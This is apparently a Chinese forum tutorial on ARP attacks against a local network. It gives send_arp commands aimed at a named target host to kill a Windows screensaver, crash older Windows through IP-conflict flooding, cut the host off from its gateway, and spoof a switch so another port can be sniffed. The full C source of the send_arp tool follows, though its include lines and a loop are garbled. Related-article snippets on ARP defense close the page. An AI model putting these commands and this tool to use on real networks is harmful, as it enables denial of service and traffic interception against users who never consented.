我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。
网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。
ARP也是如此。
以下讨论的机子有
一个要攻击的机子:10.5.4.178
硬件地址:52:54:4C:98:EE:2F
我的机子: :10.5.3.69
硬件地址:52:54:4C:98:ED:C5
网关: 10.5.0.3
硬件地址:00:90:26:3D:0C:F3
一台交换机另一端口的机子:10.5.3.3
硬件地址:52:54:4C:98:ED:F7
一:用ARP破WINDOWS的屏保
原理:利用IP冲突的级别比屏保高,当有冲突时,就会跳出屏保。
关键:ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 40
二:用ARP导致IP冲突,死机
原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。
注:对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING 有效的多.对LINUX,明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \
10.5.4.178 52:54:4C:98:EE:2F 999999999
三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。
原理:用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \
10.5.4.178 00:90:26:3D:0C:F3 1
注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP高速缓存会被被攻击的机子正确刷新,于是只要...
四:用ARP欺骗交换机,可监听到交换机另一端的机子。
可能需要修改一下send_arp.c,构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗,然后就可以监听了
不过需要指出,欺骗以后,同一个MAC地址就有两个端口号
yuange说,“这样其实就是一个竞争问题。”
好象ARP 以后,对整个网络会有点影响,不过我不敢确定
既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。
对被监听者会有影响,因为他掉了一部分数据。
当然还有其他一些应用,需要其他技术的配合。
以下是send_arp.c的源程序
CODE:
/*
This program sends out one ARP packet with source/target IP and Ethernet hardware addresses suuplied by the user. It compiles and works on Linux and will probably work on any Unix that has SOCK_PACKET. [email]volobuev@t1.chem.umn.edu[/email] */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ETH_HW_ADDR_LEN 6 #define IP_ADDR_LEN 4 #define ARP_FRAME_TYPE 0x0806 #define ETHER_HW_TYPE 1 #define IP_PROTO_TYPE 0x0800 #define OP_ARP_REQUEST 2 #define OP_ARP_QUEST 1 #define DEFAULT_DEVICE "eth0" char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"}; struct arp_packet { u_char targ_hw_addr[ETH_HW_ADDR_LEN]; u_char src_hw_addr[ETH_HW_ADDR_LEN]; u_short frame_type; u_short hw_type; u_short prot_type; u_char hw_addr_size; u_char prot_addr_size; u_short op; u_char sndr_hw_addr[ETH_HW_ADDR_LEN]; u_char sndr_ip_addr[IP_ADDR_LEN]; u_char rcpt_hw_addr[ETH_HW_ADDR_LEN]; u_char rcpt_ip_addr[IP_ADDR_LEN]; u_char padding[18]; }; void die (char *); void get_ip_addr (struct in_addr *, char *); void get_hw_addr (char *, char *); int main (int argc, char * argv[]) { struct in_addr src_in_addr, targ_in_addr; struct arp_packet pkt; struct sockaddr sa; int sock; int j,number; if (argc != 6) die(usage); sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP)); if (sock < 0) { perror("socket"); exit(1); } number=atoi(argv[5]); pkt.frame_type = htons(ARP_FRAME_TYPE); pkt.hw_type = htons(ETHER_HW_TYPE); pkt.prot_type = htons(IP_PROTO_TYPE); pkt.hw_addr_size = ETH_HW_ADDR_LEN; pkt.prot_addr_size = IP_ADDR_LEN; pkt.op = htons(OP_ARP_QUEST); get_hw_addr(pkt.targ_hw_addr, argv[4]); get_hw_addr(pkt.rcpt_hw_addr, argv[4]); get_hw_addr(pkt.src_hw_addr, argv[2]); get_hw_addr(pkt.sndr_hw_addr, argv[2]); get_ip_addr(&src_in_addr, argv[1]); get_ip_addr(&targ_in_addr, argv[3]); memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN); bzero(pkt.padding,18); strcpy(sa.sa_data,DEFAULT_DEVICE); for (j=0;j { if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } } exit(0); } void die (char *str) { fprintf(stderr,"%s\n",str); exit(1); } void get_ip_addr (struct in_addr *in_addr, char *str) { struct hostent *hostp; in_addr->s_addr = inet_addr(str); if(in_addr->s_addr == -1) { if ((hostp = gethostbyname(str))) bcopy(hostp->h_addr, in_addr, hostp->h_length); else { fprintf(stderr, "send_arp: unknown host %s\n", str); exit(1); } } } void get_hw_addr (char *buf, char *str) { int i; char c, val; for(i = 0; i < ETH_HW_ADDR_LEN; i++) { if (!(c = tolower(*str++))) die("Invalid hardware address"); if (isdigit(c)) val = c - '0'; else if (c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf = val << 4; if (!(c = tolower(*str++))) die("Invalid hardware address"); if (isdigit(c)) val = c - '0'; else if (c >= 'a' && c <= 'f') val = c-'a'+10; else die("Invalid hardware address"); *buf++ |= val; if (*str == ':') str++; } } |
相关推荐
ARP攻击是一种针对网络层协议地址解析协议(Address Resolution Protocol)的攻击方式,它通常发生在局域网环境中。这种攻击能够导致数据包被错误地转发,甚至完全中断网络连接,对网络安全构成严重威胁。ARP攻击...
局域网ARP攻击解决方案 局域网ARP攻击是指攻击者通过欺骗局域网中的设备,篡改ARP缓存表,导致设备无法上网或无法通信的一种网络攻击行为。这种攻击方式利用了ARP协议的工作过程,攻击者可以通过发送欺骗性的ARP...
电脑基础攻击防范ARP攻击防范实例ARP攻击防范实例ARP攻击防范实例ARP攻击防范实例ARP攻击防范实例ARP攻击防范实例
【局域网ARP攻击检测器】是一款专门针对局域网内 ARP 攻击进行检测的工具,具有操作简便、效果显著的特点。在描述中提到,它在公司应对“永恒之蓝”这种网络威胁时发挥了重要作用,说明这款检测器在网络安全防护方面...
手把手教你玩转ARP 加强ARP 的了解。增加认识网络基础。
### ARP攻击防御与检测 #### 一、ARP协议工作原理及背景 在现代网络通信中,TCP/IP协议栈是互联网的基础。每一台主机都拥有一个唯一的IP地址用于在网络中进行定位,而在实际的数据传输过程中,数据包是通过48位的...
如何排查内网ARP攻击造成的网络掉线 ARP 攻击是指攻击者通过发送伪装的 ARP 数据包来欺骗局域网中的设备,使得设备将数据包发送到错误的目的地,从而导致网络掉线、本地网络IP地址冲突、网速时快时慢等问题。解决 ...
ARP攻击是一种网络层欺骗技术,主要利用了ARP协议的缺陷。ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中的一个关键组件,它的作用是将IP地址映射为MAC地址,以便于数据在网络中传输。当网络...
【Qt实现飞秋拦截助手—ARP攻击 完整项目代码】是一个基于Qt框架的软件开发项目,主要功能是实现对飞秋(FeiQ)通信软件的拦截,并利用ARP攻击技术进行网络通信的监控和控制。这个项目对于理解Qt编程、网络协议以及...
ARP攻击相关资料ARP攻击相关资料ARP攻击相关资料ARP攻击相关资料ARP攻击相关资料ARP攻击相关资料ARP攻击相关资料
"反arp攻击软件"是针对这种攻击类型设计的专业工具,它的主要功能是保护用户的网络连接免受ARP欺骗的影响。这类软件通常具备以下特点: 1. 实时监控:软件会持续监控局域网内的ARP流量,一旦发现异常的ARP请求或...
然而,由于ARP协议的设计缺陷,它容易受到ARP攻击,特别是ARP欺骗。ARP欺骗是攻击者通过发送虚假的ARP响应,将目标主机的IP地址与错误的MAC地址关联,从而控制或中断网络流量。 1. ARP欺骗原理: ARP欺骗的基础...
### h3c交换机防止ARP攻击全攻略 #### 概述 随着网络环境变得日益复杂,网络攻击手段也不断更新,ARP(地址解析协议)攻击成为了一种常见的威胁。ARP攻击能够通过伪造ARP应答来篡改网络中的数据包路径,从而实现...
Win7下如何清除arp缓存防止被arp攻击和arp欺骗 arp缓存是一种高速缓存机制,用于存储近期访问的IP地址和MAC地址的映射关系。然而,这种机制也存在一些安全隐患,攻击者可以通过arp欺骗和arp攻击来获取敏感信息或...
ARP攻击小程序是一款基于MFC(Microsoft Foundation Classes)框架开发的应用程序,主要功能是实现局域网内的ARP(Address Resolution Protocol)攻击。ARP协议是TCP/IP网络中的重要组件,它的主要作用是在IP地址与...
**ARP攻击详解** ARP(Address Resolution Protocol)是地址解析协议,是TCP/IP协议栈中的一个关键组件,负责将网络层的IP地址转换为数据链路层的物理MAC地址,以便于在网络中正确地发送数据帧。然而,ARP协议本身...
### 图解ARP攻击方式及其防治方法 #### ARP攻击概述 ARP(Address Resolution Protocol)攻击是一种在网络层通过伪造ARP应答来篡改目标主机ARP缓存表中的数据,从而导致网络通信异常的技术手段。ARP攻击常见于...
ARP攻击是一种常见的网络攻击方式,主要通过ARP协议(地址解析协议)的漏洞进行。在ARP攻击中,攻击者通常会伪造ARP报文,将自己的MAC地址伪造成网络中其他设备的MAC地址,并发送给网络上的其他设备,使得这些设备的...